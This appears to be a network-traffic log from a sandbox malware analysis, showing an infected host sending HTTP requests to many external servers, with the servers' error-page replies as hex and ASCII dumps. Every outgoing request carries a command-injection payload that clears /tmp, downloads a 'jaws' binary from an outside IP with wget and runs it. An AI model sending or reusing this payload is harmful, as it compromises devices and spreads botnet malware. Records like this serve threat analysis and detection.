                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at servicedesk.tradeweb.net Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            343192.168.2.235633087.55.253.13880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:09.847234011 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:10.059305906 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:09 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            344192.168.2.2355232164.92.241.13380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:09.847929955 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:10.059967041 CET368INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Keep-Alive: timeout=5
                                                            Vary: Accept-Encoding
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            345192.168.2.2343272120.46.144.12080
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:10.106478930 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:10.432806015 CET320INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.2
                                                            Date: Fri, 26 Jan 2024 14:32:10 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 153
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            346192.168.2.2341598104.17.247.18680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.557512045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            347192.168.2.2350596173.232.181.21680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.559221029 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:11.679014921 CET322INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Fri, 26 Jan 2024 14:32:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 162
                                                            Connection: keep-alive
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            348192.168.2.233733674.208.140.12380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.570525885 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:11.701881886 CET507INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:11 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 313
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 2e 6c 6f 63 61 6c 64 6f 6d 61 69 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at localhost.localdomain Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            349192.168.2.2354542154.3.88.6180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.576925039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            350192.168.2.233662869.135.54.10680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.581497908 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:11.724512100 CET495INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:11 GMT
                                                            Server: Apache/2.2.15 (CentOS)
                                                            Content-Length: 301
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            351192.168.2.234101085.192.198.14580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.645204067 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:11.854223013 CET110INHTTP/1.0 404
                                                            Content-Type: text/html
                                                            Data Raw: 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 2f 31 2e 30 20 34 30 34 20 d5 d2 b2 bb b5 bd b6 d4 cf f3 0a 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e
                                                            Data Ascii: <body><h1>HTTP/1.0 404 </h1></body>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            352192.168.2.233413650.228.145.13380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.679336071 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:12.321755886 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:13.089562893 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:14.593368053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:17.633038998 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:23.776137114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:35.806432962 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:33:00.634987116 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            353192.168.2.234108496.11.176.8680
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.726294994 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:11.871064901 CET899INHTTP/1.0 404 Not Found
                                                            Server: SonicWALL
                                                            Expires: -1
                                                            Cache-Control: no-cache
                                                            Content-type: text/html;charset=UTF-8
                                                            X-Content-Type-Options: nosniff
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 73 70 61 6e 2e 75 72 6c 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 70 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 73 70 61 6e 2e 73 65 72 76 65 72 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 72 6c 22 3e 26 23 78 32 46 3b 73 68 65 6c 6c 3f 63 64 20 26 23 78 32 46 3b 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 3c 2f 73 70 61 6e 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 70 3e 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 3c 70 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 72 76 65 72 22 3e 53 6f 6e 69 63 57 61 6c 6c 20 53 65 72 76 65 72 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>File not found!</title><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; }span.url { text-decoration: underline; }p {margin-left: 3em;}span.server {font-size: smaller;}/*...*/--></style></head><body><h1>File not found!</h1><p>The requested URL <span class="url">&#x2F;shell?cd &#x2F;tmp;rm -rf *;wget </span> was not found on this server.</p><p>If you entered the URL manually please check your spelling and try again.</p><h2>Error 404</h2><p><span class="server">SonicWall Server</span></p></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            354192.168.2.2344666162.155.183.19380
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.781833887 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            355192.168.2.2341542216.197.110.5880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:11.802136898 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:11.959090948 CET1286INHTTP/1.1 200 OK
                                                            Content-Length: 4417
                                                            Connection: Close
                                                            Cache-Control: no-cache
                                                            Content-Type: text/html; charset=utf-8
                                                            X-Frame-Options: SAMEORIGIN
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 38 3b 20 49 45 3d 45 44 47 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 61 36 61 36 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 6e 75 6d 62 65 72 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 73 65 61 72 63 68 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 6c 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 65 78 74 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 74 69 6d 65 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 75 72 6c 5d 2c 20 73 65 6c 65 63 74 2c 20 74 65 78 74 61 72 65 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 36 32 36 32 36 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2e 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 70 70 65 61 72 61 6e 63 65 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
